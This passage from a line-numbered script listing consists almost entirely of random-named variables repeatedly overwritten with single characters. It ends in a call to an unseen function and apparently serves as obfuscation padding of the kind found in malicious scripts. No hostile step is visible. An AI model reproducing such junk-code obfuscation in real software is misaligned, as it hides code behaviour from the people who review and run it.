322 | zbqngcaj = "C"; | |
323 | zbqngcaj = "0"; | |
324 | vcakqfo = "X"; | |
325 | vcakqfo = "y"; | |
326 | vcakqfo = "n"; | |
327 | vcakqfo = "G"; | |
328 | vcakqfo = "S"; | |
329 | vcakqfo = "c"; | |
330 | vcakqfo = "q"; | |
331 | vcakqfo = "v"; | |
332 | aafqixm = "s"; | |
333 | aafqixm = "i"; | |
334 | aafqixm = "v"; | |
335 | aafqixm = "a"; | |
336 | aafqixm = "d"; | |
337 | aafqixm = "B"; | |
338 | aafqixm = "k"; | |
339 | uhdjrl = "c"; | |
340 | uhdjrl = "Q"; | |
341 | uhdjrl = "y"; | |
342 | uhdjrl = "W"; | |
343 | uhdjrl = "q"; | |
344 | uhdjrl = "H"; | |
345 | uhdjrl = "H"; | |
346 | uhdjrl = "h"; | |
347 | uhdjrl = "N"; | |
348 | uhdjrl = "x"; | |
349 | wkxzpthd = "W"; | |
350 | wkxzpthd = "n"; | |
351 | wkxzpthd = "F"; | |
352 | wkxzpthd = "Q"; | |
353 | wkxzpthd = "g"; | |
354 | wkxzpthd = "d"; | |
355 | wkxzpthd = "m"; | |
356 | dntnoot = "c"; | |
357 | dntnoot = "Q"; | |
358 | dntnoot = "W"; | |
359 | dntnoot = "a"; | |
360 | dntnoot = "S"; | |
361 | dntnoot = "z"; | |
362 | dntnoot = "n"; | |
363 | dntnoot = "f"; | |
364 | dntnoot = "b"; | |
365 | dntnoot = "I"; | |
366 | ikknn = "t"; | |
367 | ikknn = "v"; | |
368 | ikknn = "S"; | |
369 | ikknn = "k"; | |
370 | ikknn = "O"; | |
371 | ikknn = "Z"; | |
372 | ikknn = "D"; | |
373 | ikknn = "z"; | |
374 | ikknn = "Y"; | |
375 | ikknn = "4"; | |
376 | yhnan = "X"; | |
377 | yhnan = "C"; | |
378 | yhnan = "A"; | |
379 | yhnan = "W"; | |
380 | yhnan = "N"; | |
381 | yhnan = " "; | |
382 | oxfzkuk = "m"; | |
383 | oxfzkuk = "i"; | |
384 | oxfzkuk = "g"; | |
385 | oxfzkuk = "S"; | |
386 | oxfzkuk = "d"; | |
387 | oxfzkuk = "t"; | |
388 | oxfzkuk = "s"; | |
389 | heiaox = "E"; | |
390 | heiaox = "h"; | |
391 | heiaox = "W"; | |
392 | heiaox = "h"; | |
393 | heiaox = "Q"; | |
394 | heiaox = "Y"; | |
395 | rykzzza = "Y"; | |
396 | rykzzza = "z"; | |
397 | rykzzza = "J"; | |
398 | rykzzza = "q"; | |
399 | rykzzza = "F"; | |
400 | rykzzza = "f"; | |
401 | dbiqu = "f"; | |
402 | dbiqu = "S"; | |
403 | dbiqu = "X"; | |
404 | dbiqu = "d"; | |
405 | dbiqu = "f"; | |
406 | dbiqu = "J"; | |
407 | dbiqu = "a"; | |
408 | svadgpxrf = "x"; | |
409 | svadgpxrf = "e"; | |
410 | svadgpxrf = "r"; | |
411 | svadgpxrf = "T"; | |
412 | svadgpxrf = "c"; | |
413 | svadgpxrf = "i"; | |
414 | svadgpxrf = "O"; | |
415 | svadgpxrf = "9"; | |
416 | bwoeez = "r"; | |
417 | bwoeez = "r"; | |
418 | bwoeez = "V"; | |
419 | bwoeez = "C"; | |
420 | bwoeez = "U"; | |
421 | bwoeez = "P"; | |
422 | bwoeez = "e"; | |
423 | bwoeez = "K"; | |
424 | ckruw = "q"; | |
425 | ckruw = "Z"; | |
426 | ckruw = "l"; | |
427 | ckruw = "c"; | |
428 | ckruw = "S"; | |
429 | ckruw = "p"; | |
430 | ckruw = "u"; | |
431 | ckruw = "y"; | |
432 | ckruw = "l"; | |
433 | mukgzd = "t"; | |
434 | mukgzd = "M"; | |
435 | mukgzd = "H"; | |
436 | mukgzd = "R"; | |
437 | mukgzd = "c"; | |
438 | mukgzd = "K"; | |
439 | mukgzd = "m"; | |
440 | mukgzd = "n"; | |
441 | mukgzd = "g"; | |
442 | mukgzd = "j"; | |
443 | pnfsqn = "E"; | |
444 | pnfsqn = "l"; | |
445 | pnfsqn = "P"; | |
446 | pnfsqn = "s"; | |
447 | pnfsqn = "l"; | |
448 | pnfsqn = "B"; | |
449 | pnfsqn = "-"; | |
450 | qdfpa = "D"; | |
451 | qdfpa = "U"; | |
452 | qdfpa = "G"; | |
453 | qdfpa = "r"; | |
454 | qdfpa = "W"; | |
455 | qdfpa = "K"; | |
456 | qdfpa = "B"; | |
457 | qdfpa = "W"; | |
458 | vqoysebnl = "g"; | |
459 | vqoysebnl = "Q"; | |
460 | vqoysebnl = "z"; | |
461 | vqoysebnl = "W"; | |
462 | vqoysebnl = "v"; | |
463 | vqoysebnl = "o"; | |
464 | vqoysebnl = "z"; | |
465 | vqoysebnl = "U"; | |
466 | vqoysebnl = "%"; | |
467 | edkjgjf = "f"; | |
468 | edkjgjf = "H"; | |
469 | edkjgjf = "t"; | |
470 | edkjgjf = "K"; | |
471 | edkjgjf = "V"; | |
472 | edkjgjf = "e"; | |
473 | edkjgjf = "8"; | |
474 | aoblrfg = "V"; | |
475 | aoblrfg = "Y"; | |
476 | aoblrfg = "X"; | |
477 | aoblrfg = "o"; | |
478 | aoblrfg = "O"; | |
479 | aoblrfg = "O"; | |
480 | aoblrfg = "X"; | |
481 | aoblrfg = "a"; | |
482 | aoblrfg = "A"; | |
483 | aoblrfg = "F"; | |
484 | btmsoi = "q"; | |
485 | btmsoi = "A"; | |
486 | btmsoi = "O"; | |
487 | btmsoi = "N"; | |
488 | btmsoi = "r"; | |
489 | btmsoi = "x"; | |
490 | btmsoi = "e"; | |
491 | btmsoi = "z"; | |
492 | btmsoi = "2"; | |
493 | qyzap = "S"; | |
494 | qyzap = "k"; | |
495 | qyzap = "k"; | |
496 | qyzap = "a"; | |
497 | qyzap = "e"; | |
498 | qyzap = "S"; | |
499 | wedejlzf ( ); |
|